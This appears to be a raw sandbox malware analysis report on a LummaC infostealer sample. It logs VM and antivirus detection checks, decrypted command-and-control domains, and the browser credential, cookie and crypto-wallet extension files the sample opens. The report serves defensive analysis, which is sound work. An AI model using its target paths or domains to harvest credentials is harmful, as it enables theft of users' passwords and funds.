Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: file.exe	String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: file.exe	String found in binary or memory: /LoadInf=
Source: file.exe	String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2004,i,15247930655043870069,15177389296022328392,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1984,i,17816864313725949295,15185844490458716427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2004,i,15247930655043870069,15177389296022328392,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 1800704 > 1048576

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02380371 push ebp; ret	0_2_02380376
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02382028 push esp; retf	0_2_02382030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02381655 push ecx; retf	0_2_02381661
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_023B090E push esi; ret	0_2_023B0976
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_029005EC push esp; retf	0_2_029005F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028FE935 push ebp; ret	0_2_028FE93A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028FFC19 push ecx; retf	0_2_028FFC25

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 5684	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5684	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2025282303.000000000077D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.00000000007C3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02915B70 LdrInitializeThunk,

0_2_02915B70

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02360589 mov edx, dword ptr fs:[00000030h]	0_2_02360589
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02360B49 mov eax, dword ptr fs:[00000030h]	0_2_02360B49
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02361198 mov eax, dword ptr fs:[00000030h]	0_2_02361198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02361199 mov eax, dword ptr fs:[00000030h]	0_2_02361199
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02360EF9 mov eax, dword ptr fs:[00000030h]	0_2_02360EF9

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: suitcaseacanehalk.shop
Source: file.exe	String found in binary or memory: absentconvicsjawun.shop
Source: file.exe	String found in binary or memory: pushjellysingeywus.shop
Source: file.exe	String found in binary or memory: economicscreateojsu.shop
Source: file.exe	String found in binary or memory: wifeplasterbakewis.shop
Source: file.exe	String found in binary or memory: mealplayerpreceodsju.shop
Source: file.exe	String found in binary or memory: bordersoarmanusjuw.shop
Source: file.exe	String found in binary or memory: entitlementappwo.shop
Source: file.exe	String found in binary or memory: palmeventeryjusk.shop

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000002.2025282303.0000000000794000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 6884, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000000.00000003.1938084247.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000002.2026917316.00000000028D8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: Wallets/BinanceC:\Users\user\AppData\Roaming\Binance
Source: file.exe, 00000000.00000003.1937668172.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.1938084247.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
